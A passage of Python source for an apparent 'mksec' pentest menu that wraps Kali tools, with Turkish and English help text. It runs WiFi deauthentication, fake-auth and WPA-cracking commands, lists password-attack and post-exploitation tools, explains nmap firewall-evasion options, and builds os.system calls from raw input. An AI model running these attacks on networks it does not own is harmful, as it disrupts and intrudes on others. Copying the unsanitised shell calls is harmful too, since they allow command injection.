print("\x1b[1m\x1b[36m\n\x1b[7m\tWeb Application Analysis\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Skipfish\n\x1b[37m02\x1b[36m Wpscan\n\x1b[37m03\x1b[36m Sqlmap")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "skipfish":
skipfish()
elif uinput == "2" or uinput == "02" or uinput == "wpscan":
wpscan()
elif uinput == "3" or uinput == "03" or uinput == "sqlmap":
sqlmap()
elif uinput == "":
os.system("clear")
webApplicationAnalysis()
def passwordAttacks():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tPassword Attacks\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Cewl\n\x1b[37m02\x1b[36m Crunch\n\x1b[37m03\x1b[36m Hashcat\n\x1b[37m04\x1b[36m John\n\x1b[37m05\x1b[36m Medusa\n\x1b[37m06\x1b[36m Ncrack\n\x1b[37m07\x1b[36m Hash-identifier\n\x1b[37m08\x1b[36m Wordlist")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "cewl":
cewl()
elif uinput == "2" or uinput == "02" or uinput == "crunch":
crunch()
elif uinput == "3" or uinput == "03" or uinput == "hashcat":
hashcat()
elif uinput == "4" or uinput == "04" or uinput == "john":
john()
elif uinput == "5" or uinput == "05" or uinput == "medusa":
medusa()
elif uinput == "6" or uinput == "06" or uinput == "ncrack":
ncrack()
elif uinput == "7" or uinput == "07" or uinput == "hashid" or uinput == "hash-identifier":
hashIdentifier()
elif uinput == "8" or uinput == "08" or uinput == "wordlists" or uinput == "wordlist":
wordlists()
elif uinput == "":
os.system("clear")
passwordAttacks()
def wirelessAttacks():
RandomBannerSelector()
os.system("""echo \x1b[1m\x1b[36m'
\x1b[7mWireless Attacks\x1b[0m\x1b[1m
\x1b[37m1\x1b[36m Monitor Mode
\x1b[37m2\x1b[36m Managed Mode
\x1b[37m3\x1b[36m Airodump-ng ile Butun Aglari Izle
\x1b[37m4\x1b[36m Airodump-ng ile Hedef Agi Detayli Incele
\x1b[37m5\x1b[36m Aireplay-ng ile Deauth (Agdan Dusurme) Saldirisi
\x1b[37m6\x1b[36m Aircrack-ng ile Wep Cracking
\x1b[37m7\x1b[36m Aireplay-ng ile Fake Auth
\x1b[37m8\x1b[36m Fake Auth Sonrasi Paket Yollamak
\x1b[37m9\x1b[36m Wpa Handshake Yakala
\x1b[37m10\x1b[36m Wpa Cracking'""")
userInput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
userInput = userInput.strip().lower()
if userInput == "1":
os.system("iwconfig")
interface = input("\033[36m[mksec]\033[36m[interface]\033[0m ")
os.system("ifconfig " + interface + " down")
os.system("iwconfig " + interface + " mode monitor")
os.system("ifconfig " + interface + " up")
os.system("iwconfig")
wirelessAttacks()
# 1>> airmon-ng start wlan0 (monitor mode)
# bu sayede monitor mode' a gecebiliriz.
# kontrol etmek icin ifconfig kullan.
# 2>> airmon-ng stop wlan0mon
# bu sayede monitor mode' u devredisi birak.
# kontrol etmek icin ifconfig kullan.
elif userInput == "2":
os.system("iwconfig")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("ifconfig " + interface + " down")
os.system("iwconfig " + interface + " mode managed")
os.system("ifconfig " + interface + " up")
os.system("iwconfig")
wirelessAttacks()
elif userInput == "3":
os.system("iwconfig")
os.system("echo 'monitor mode kullandiginizdan emin olun'")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("airodump-ng " + interface)
elif userInput == "4":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo 'once butun aglari inceleyin ve daha sonra kendinize hedef ag belirleyin\nhedef agin channel, bssid bilgilerini almaniz yeterlidir'")
ch = input("\x1b[1m\033[36m[mksec]\033[36m[channel]\033[37m\x1b[0m ")
bssid = input("\x1b[1m\033[36m[mksec]\033[36m[bssid]\033[37m\x1b[0m ")
os.system("echo '\033[33mex:/root/Desktop/mksec\033[32m' ")
write = input("\x1b[1m\033[36m[mksec]\033[36m[output]\033[37m\x1b[0m ")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("airodump-ng --channel " + ch + " --bssid " + bssid + " --write " + write + " " + interface)
elif userInput == "5":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo 'once hedef aga bagli cihazlarin station bilgisini almalisiniz. station: hedef cihazin mac adresidir\nayrica hedef modemin bssid si gereklidir'")
os.system("echo '\033[33mattack type\nex:10 = kisa sureli, 10000 = uzun sureli\033[32m' ")
deauth = input("\x1b[1m\033[36m[mksec]\033[36m[deauth.packages]\033[37m\x1b[0m ")
router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
target = input("\x1b[1m\033[36m[mksec]\033[36m[target.station]\033[37m\x1b[0m ")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("aireplay-ng --deauth " + deauth + " -a " + router + " -c " + target + " " + interface)
elif userInput == "6":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
os.system("echo '\033[33mex:/root/Desktop/test-01.cap\033[32m' ")
location = input("\x1b[1m\033[36m[mksec]\033[36m[cap.file.location]\033[37m\x1b[0m ")
os.system("aircrack-ng " + location + "")
elif userInput == "7":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
os.system("iwconfig")
os.system("ip addr")
wifimac = input("\x1b[1m\033[36m[mksec]\033[36m[your.wifi.mac.addr]\033[37m\x1b[0m ")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("aireplay-ng --fakeauth 0 -a " + router + " -h " + wifimac + " " + interface)
elif userInput == "8":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
os.system("echo 'fake auth yaptiginiza emin olun'")
router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
os.system("iwconfig")
os.system("ip addr")
wifimac = input("\x1b[1m\033[36m[mksec]\033[36m[your.wifi.mac.addr]\033[37m\x1b[0m ")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("aireplay-ng --arpreplay -b " + router + " -h " + wifimac + " " + interface)
elif userInput == "9":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin. kisa sureli deauth yapin ve 4. islemin sag ust kosesinde wpa handshake yazdiginda ctrl+c ile durdurun\033[32m' ")
os.system("echo '\033[33mattack type\nex:10 = kisa sureli, 10000 = uzun sureli\033[32m' ")
deauth = input("\x1b[1m\033[36m[mksec]\033[36m[deauth.packages]\033[37m\x1b[0m ")
router = input("\x1b[1m\033[36m[mksec]\033[36m[router.bssid]\033[37m\x1b[0m ")
target = input("\x1b[1m\033[36m[mksec]\033[36m[target.station]\033[37m\x1b[0m ")
interface = input("\x1b[1m\033[36m[mksec]\033[36m[interface]\033[37m\x1b[0m ")
os.system("aireplay-ng --deauth " + deauth + " -a " + router + " -c " + target + " " + interface)
elif userInput == "10":
os.system("echo 'monitor mode kullandiginizdan emin olun'")
os.system("echo '\033[33monce 4. islemi yeni terminalde acik birakin ardindan bunu yapin\033[32m' ")
os.system("echo '\033[33mex : /root/Desktop/handshake-file-01.cap\033[32m' ")
handshake = input("\x1b[1m\033[36m[mksec]\033[36m[handshake.file]\033[37m\x1b[0m ")
os.system("echo '\033[33mex : /root/Desktop/wordlist\033[32m' ")
wordlist = input("\x1b[1m\033[36m[mksec]\033[36m[wordlist.file]\033[37m\x1b[0m ")
os.system("aircrack-ng " + handshake + " -w " + wordlist)
elif userInput == "":
os.system("clear")
wirelessAttacks()
elif userInput == "exit":
quit()
elif userInput == "quit":
quit()
elif userInput == "help":
os.system("clear")
help()
elif userInput == "-h":
os.system("clear")
help()
elif userInput == "--help":
os.system("clear")
help()
elif userInput == "?":
os.system("clear")
help()
elif userInput == "about":
os.system("clear")
about()
elif userInput == "back":
os.system("clear")
MainMenu()
else:
os.system("clear")
wirelessAttacks()
def exploitationTools():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\x1b[7m\n\tExploitation Tools\n\n\x1b[0m\x1b[1m\x1b[37m01\x1b[36m Payload Creator and Listener\n\x1b[37m02\x1b[36m Searchsploit\n\x1b[37m03\x1b[36m Veil")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "payload creator and listener":
PayloadCreatorAndListener()
elif uinput == "2" or uinput == "02" or uinput == "searchsploit":
searchsploit()
elif uinput == "3" or uinput == "03" or uinput == "veil":
veil()
elif uinput == "":
os.system("clear")
exploitationTools()
def sniffingSpoofing():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tSniffing & Spoofing\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Macchanger\n\x1b[37m02\x1b[36m Mitmproxy\n\x1b[37m03\x1b[36m Netsniff-ng\n\x1b[37m04\x1b[36m Responder\n\x1b[37m05\x1b[36m Arpspoof")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "macchanger":
macchanger()
elif uinput == "2" or uinput == "02" or uinput == "mitmproxy":
macchanger()
elif uinput == "3" or uinput == "03" or uinput == "netsniff-ng":
macchanger()
elif uinput == "4" or uinput == "04" or uinput == "responder":
responder()
elif uinput == "5" or uinput == "05" or uinput == "arpspoof":
arpspoof()
elif uinput == "":
os.system("clear")
sniffingSpoofing()
def postExploitation():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tPost Exploitation\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Exe2hex\n\x1b[37m02\x1b[36m Weevely\n\x1b[37m03\x1b[36m Veil")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "exe2hex":
exe2hex()
elif uinput == "2" or uinput == "02" or uinput == "weevely":
weevely()
elif uinput == "3" or uinput == "03" or uinput == "veil":
veil()
elif uinput == "":
os.system("clear")
postExploitation()
def forensics():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tForensics\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Binwalk\n\x1b[37m02\x1b[36m Bulk_extractor\n\x1b[37m03\x1b[36m Foremost\n\x1b[37m04\x1b[36m Hashdeep")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "binwalk":
binwalk()
elif uinput == "2" or uinput == "02" or uinput == "bulk_extractor":
bulkExtractor()
elif uinput == "3" or uinput == "03" or uinput == "foremost":
foremost()
elif uinput == "4" or uinput == "04" or uinput == "hashdeep":
hashdeep()
elif uinput == "":
os.system("clear")
forensics()
def reportingTools():
RandomBannerSelector()
print("""\x1b[1m\x1b[36m\n\x1b[7m\tReporting Tools\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Cutycapt\n\x1b[37m02\x1b[36m Pipal""")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "cutycapt":
cutycapt()
elif uinput == "2" or uinput == "02" or uinput == "pipal":
pipal()
elif uinput == "":
os.system("clear")
reportingTools()
def linuxcommands():
RandomBannerSelector()
print("\x1b[1m\x1b[36m\n\x1b[7m\tLinux Commands\n\x1b[0m\x1b[1m\n\x1b[37m01\x1b[36m Find\n\x1b[37m02\x1b[36m Grep\n\x1b[37m03\x1b[36m Man\n\x1b[37m04\x1b[36m Cli\n\x1b[37m05\x1b[36m All Linux Commands")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
uinput = uinput.strip().lower()
UserInputs(uinput+"mainmenu")
if uinput == "1" or uinput == "01" or uinput == "find":
os.system("clear")
find()
elif uinput == "2" or uinput == "02" or uinput == "grep":
os.system("clear")
grep()
elif uinput == "3" or uinput == "03" or uinput == "man":
os.system("clear")
man()
elif uinput == "4" or uinput == "04" or uinput == "cli":
os.system("clear")
cli()
elif uinput == "5" or uinput == "05" or uinput == "alc":
os.system("clear")
alc()
elif uinput == "":
os.system("clear")
linuxcommands()
# tools
def dmitry():
url = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[dmitry]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mCollects information from the target site.\n\x1b[33mTR:\x1b[37mHedef siteden bilgi toplar.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target site \x1b[32mex: test.com\x1b[37m\nOUTPUT{} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m".format(url,output))
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif uinput.lower() == "run":
os.system("sudo dmitry -winsepf " + url.strip() + " -o " + output.strip())
def ikeScan():
ip = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[ike-scan]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mTests whether the IP address is a VPN server. \x1b[1m\x1b[33mEX:\x1b[37m Search 'ike' on Shodan and test the resulting ip address.\n\x1b[33mTR:\x1b[37mIP adresinin vpn server olup olmadigini test eder. \x1b[33mÖRN: \x1b[37mShodan üzerinden 'ike' aramasını yap ve çıkan ip adresini test et.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m".format(ip))
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "run" in uinput.lower():
os.system("sudo ike-scan " + ip.strip())
def netdiscover():
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
iprange = " "
iface = " {} ".format(youriface)
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[netdiscover]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mScans devices on the local network. Displays IP addresses.\n\x1b[33mTR:\x1b[37mLocal ağdaki cihazları tarar. IP adreslerini görüntüler.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Your interface =\x1b[32m{}\x1b[37m\nIP {} YES Your IP address = \x1b[32m{} \x1b[36mex: /24, /16, /8\x1b[37m".format(iface,youriface,iprange,ipv4))
elif "set ip" in uinput.lower():
iprange = uinput
iprange = iprange.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "set iface" in uinput.lower():
iface = uinput
iface = iface.replace("set iface ","").replace("set IFACE ","").replace("SET iface ","").replace("SET IFACE ","").center(25)
elif "run" in uinput.lower():
os.system("sudo netdiscover -i " + iface.strip() + " -r " + iprange.strip())
def nbtscan():
ip = " "
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[nbtscan]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mScans devices on the local network with netbios. Displays IP addresses.\n\x1b[33mTR:\x1b[37mLocal ağdaki cihazları netbios ile tarar. IP adreslerini görüntüler.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Your IP address = \x1b[32m{} \x1b[36mex: /24, /16, /8\x1b[37m".format(ip,ipv4))
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "run" in uinput.lower():
os.system("sudo nbtscan " + ip.strip())
def theHarvester():
domain = " "
output = " "
source = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[theharvester]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mScans the target site in search engines (google, shodan etc...). If the \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mHedef siteyi arama motorlarında(google,shodan vs...)tarar. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nDOMAIN {} YES Target domain \x1b[32mex: test.com\x1b[37m\nOUTPUT {} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m\nSOURCE {} YES From which source? Multiple sources can be added. To view resources: \x1b[32m'--sources'\x1b[37m".format(domain,output,source))
elif "set domain" in uinput.lower():
domain = uinput
domain = domain.replace("set domain ","").replace("set DOMAIN ","").replace("SET domain ","").replace("SET DOMAIN ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "set source" in uinput.lower():
source = uinput
source = source.replace("set source ","").replace("set SOURCE ","").replace("SET source ","").replace("SET SOURCE ","").center(25)
elif "--sources" == uinput.lower():
print("\x1b[1m\x1b[32mbaidu, bing, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, exalead, github-code, google, hackertarget, hunter, intelx, linkedin,linkedin_links, netcraft, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello,twitter, urlscan, virustotal, yahoo\x1b[32m")
elif "run" == uinput.lower():
os.system("theHarvester -d " + domain.strip() + " -l 50 -b " + source.strip() + " -f " + output.strip())
elif "run -f" == uinput.lower():
os.system("cd /opt/theHarvester/ && python3 theHarvester.py -d " + domain.strip() + " -l 50 -b " + source.strip() + " -f " + output.strip())
def nmap():
ip = " "
port = " "
special = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[nmap]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mNmap, short for Network Mapper, is a free, open-source tool for vulnerability scanning and network discovery.\n\x1b[33mTR:\x1b[37mNetwork Mapper'ın kısaltması olan Nmap, güvenlik açığı taraması ve ağ keşfi için ücretsiz, açık kaynaklı bir araçtır. ")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target IP address \x1b[32mex: test.com / 108.96.10.8 / 108.96.10.8/16\x1b[37m\nPORT {} OPT Target port(s) \x1b[36mdefault: --top-ports 1000 \x1b[32mex: -p- / -p21,-80 / p21-443\x1b[37m\nSPECIAL {} OPT Optionally more parameters can be added for nmap. To see the parameters: \x1b[32m'--parameters' or '-p'\x1b[37m".format(ip,port,special))
elif "--param" in uinput.lower() or "-p" == uinput.lower():
print("\x1b[1m\x1b[33mParameters\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m==========\x1b[37m \x1b[33m===========\x1b[37m\n\x1b[32m-v:\x1b[37m \x1b[33mEN:\x1b[37m Verbose. \x1b[33mTR:\x1b[37m Ayrıntılı bilgi.\n\x1b[32m-vv:\x1b[37m \x1b[33mEN:\x1b[37m More verbose. \x1b[33mTR:\x1b[37m Daha ayrıntılı bilgi.\n\x1b[32m-p-:\x1b[37m \x1b[33mEN:\x1b[37m Scans all ports. \x1b[33mTR:\x1b[37m Bütün portları tarar.\n\x1b[32m-p 1-100:\x1b[37m \x1b[33mEN:\x1b[37m Scans all ports 1 to 100. \x1b[33mTR:\x1b[37m 1 ile 100 arasındaki bütün portları tarar.\n\x1b[32m-sS:\x1b[37m \x1b[33mEN:\x1b[37m Does a SYN scan. (This is the fastest scan.) \x1b[33mTR:\x1b[37m SYN taraması yapar. (En hızlı taramadır.)\n\x1b[32m-sV:\x1b[37m \x1b[33mEN:\x1b[37m Service version scan. (FTP, SSH, Telnet etc...) \x1b[33mTR:\x1b[37m Servis versiyon taramasıdır. (FTP, SSH , Telnet vs...)\n\x1b[32m-sT:\x1b[37m \x1b[33mEN:\x1b[37m Tries to establish a connection by capturing a handshake. (SYN,SYN-ACK,ACK) (Not recommended because it leaves logs and can be blocked by firewall.)\n \x1b[33mTR:\x1b[37m Handshake yakalayarak bağlantı kurmaya çalışır. (SYN,SYN-ACK,ACK) (Önerilmez çünkü log kaydı bırakır ve firewall tarafından engellenebilir.)\n\x1b[32m-sU:\x1b[37m \x1b[33mEN:\x1b[37m Scans for UDP. \x1b[33mTR:\x1b[37m UDP taraması yapar.\n\x1b[32m-sA:\x1b[37m \x1b[33mEN:\x1b[37m Scans for ACK. (Usually for firewall) \x1b[33mTR:\x1b[37m ACK taraması yapar. (Genellikle firewall için)\n\x1b[32m-sP:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off by pinging. \x1b[33mTR:\x1b[37m Ping atarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-A:\x1b[37m \x1b[33mEN:\x1b[37m Aggressive scanning (nmap .nse(\x1b[36mN\x1b[37mmap \x1b[36mS\x1b[37mcript \x1b[36mE\x1b[37mngine) runs all scripts.) \x1b[33mTR:\x1b[37m Agresif tarama (nmap .nse(\x1b[36mN\x1b[37mmap \x1b[36mS\x1b[37mcript \x1b[36mE\x1b[37mngine) scriptlerin hepsini çalıştırır.)\n\x1b[32m-O:\x1b[37m \x1b[33mEN:\x1b[37m Operating system detection. \x1b[33mTR:\x1b[37m İşletim sistemi tespiti yapmaya çalışır.\n\x1b[32m-Pn:\x1b[37m \x1b[33mEN:\x1b[37m No ping.\n\x1b[32m-PS:\x1b[37m \x1b[33mEN:\x1b[37m Sends TCP SYN packets. \x1b[33mTR:\x1b[37m TCP SYN paketleri gönderir.\n\x1b[32m-PA:\x1b[37m \x1b[33mEN:\x1b[37m Sends TCP ACK packets. \x1b[33mTR:\x1b[37m TCP ACK paketleri gönderir.\n\x1b[32m-PU:\x1b[37m \x1b[33mEN:\x1b[37m Sends UDP packets. \x1b[33mTR:\x1b[37m UDP paketleri gönderir.\n\x1b[32m-PE:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off using ICMP packets. \x1b[33mTR:\x1b[37m ICMP paketleri kullanarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-PR:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off using ARP packages. \x1b[33mTR:\x1b[37m ARP paketleri kullanarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-T4:\x1b[37m \x1b[33mEN:\x1b[37m Sets the speed limit. (It should take a value between 0-5.) Default value : 3 \x1b[33mTR:\x1b[37m Hız limitini ayarlar. (0-5 arasında değer almalıdır.) Varsayılan değer : 3\n\x1b[32m-D:\x1b[37m \x1b[33mEN:\x1b[37m Decoy, pretends to be browsing from another network. Used to bypass firewall. (Example available.) RND:10 = [Decoy with 10 devices] \x1b[33m\n\t TR:\x1b[37m Decoy (tuzak), başka bir ağdan tarama yapıyormuş gibi gösterir. Firewall atlatmak için kullanılır. (Örnek mevcuttur.) RND:10 = [10 tane cihaz ile tuzak]\n\x1b[32m-F:\x1b[37m \x1b[33mEN:\x1b[37m We try to bypass firewall, ids, ips devices. It sends the packet sizes we use by splitting it into 8 bytes (normally 1500 bytes). \x1b[33m\n\t TR:\x1b[37m Firewall, ids, ips cihazlarını atlatmaya çalışırız. Kullandığımız paket boyutlarını 8 byte şeklinde parçalayarak gönderir (Normalde ortalama 1500 byte)\n\x1b[32m-mtu 16:\x1b[37m \x1b[33mEN:\x1b[37m \x1b[31mM\x1b[37maximum \x1b[31mT\x1b[37mransmission \x1b[31mU\x1b[37mnit. We try to bypass firewall, ids, ips devices by determining the packet size ourselves [16,32,64,128]. \x1b[33m\n\t TR:\x1b[37m \x1b[31mM\x1b[37maximum \x1b[31mT\x1b[37mransmission \x1b[31mU\x1b[37mnit. Paket boyutunu kendimiz belirleyerek [16,32,64,128] firewall, ids, ips cihazlarını atlatmaya çalışırız.\n\x1b[32m-iL:\x1b[37m \x1b[33mEN:\x1b[37m It allows us to add a list. We must write the IP addresses (or host addresses) that we have determined for the list, line by line. \x1b[33m\n\t TR:\x1b[37m Liste eklememizi sağlar. Liste için belirlediğimiz IP adreslerini (ya da host adreslerini) satır satır yazmalıyız.\n\x1b[32m-d:\x1b[37m \x1b[33mEN:\x1b[37m Debug. \x1b[33mTR:\x1b[37m Hata ayıklama.\n\x1b[32m--reason:\x1b[37m \x1b[33mEN:\x1b[37m Reason. \x1b[33mTR:\x1b[37m Sebep.\n\x1b[32m-oA:\x1b[37m \x1b[33mEN:\x1b[37m Output. \x1b[33mTR:\x1b[37m Çıktı almamızı sağlar.\n\x1b[32m-oN:\x1b[37m \x1b[33mEN:\x1b[37m Output. (It's in the examples section.) \x1b[33mTR:\x1b[37m Çıktı almamızı sağlar. (Örnekler kısmında mevcut.)\n\x1b[32m--script vuln:\x1b[37m \x1b[33mEN:\x1b[37m Scans for vulnerabilities with Nmap scripts. \x1b[33mTR:\x1b[37m Nmap scriptleri ile güvenlik açıkları tarar.\n\x1b[32m--top-ports 108:\x1b[37m \x1b[33mEN:\x1b[37m The 108 most popular ports are shown. (108 can be changed) \x1b[33mTR:\x1b[37m En popüler 108 port gösterilir. (108 değiştirilebilir)\n\x1b[32m-p 1-100 --exclude-ports 23,25:\x1b[37m \x1b[33mEN:\x1b[37m Ports 1 to 100 are scanned, except 23 and 25. \x1b[33mTR:\x1b[37m 23 ve 25 hariç 1 ile 100 arasindaki portlar taranır.\n\n\x1b[34mEX:\x1b[37m nmap --script vuln 192.168.109\n\x1b[34mEX:\x1b[37m nmap --script http-enum.nse -p 80 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap --script ftp-vsftpd-backdoor -p 21 165.165.45.23\n\x1b[34mEX:\x1b[37m nmap -sS -O 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap -sS -sV -O -T4 -p- 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap -sS -iL /root/Desktop/deneme.txt -p 80\n\x1b[34mEX:\x1b[37m nmap -D 192.168.8.108 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -D RND:10 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -sS -sV -O -T4 -oN deneme.txt 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -f 192.168.109")
elif "set ip" in uinput.lower():
ip = uinput
ip = ip.replace("set ip ","").replace("set IP ","").replace("SET ip ","").replace("SET IP ","").center(25)
elif "set port" in uinput.lower():
port = uinput
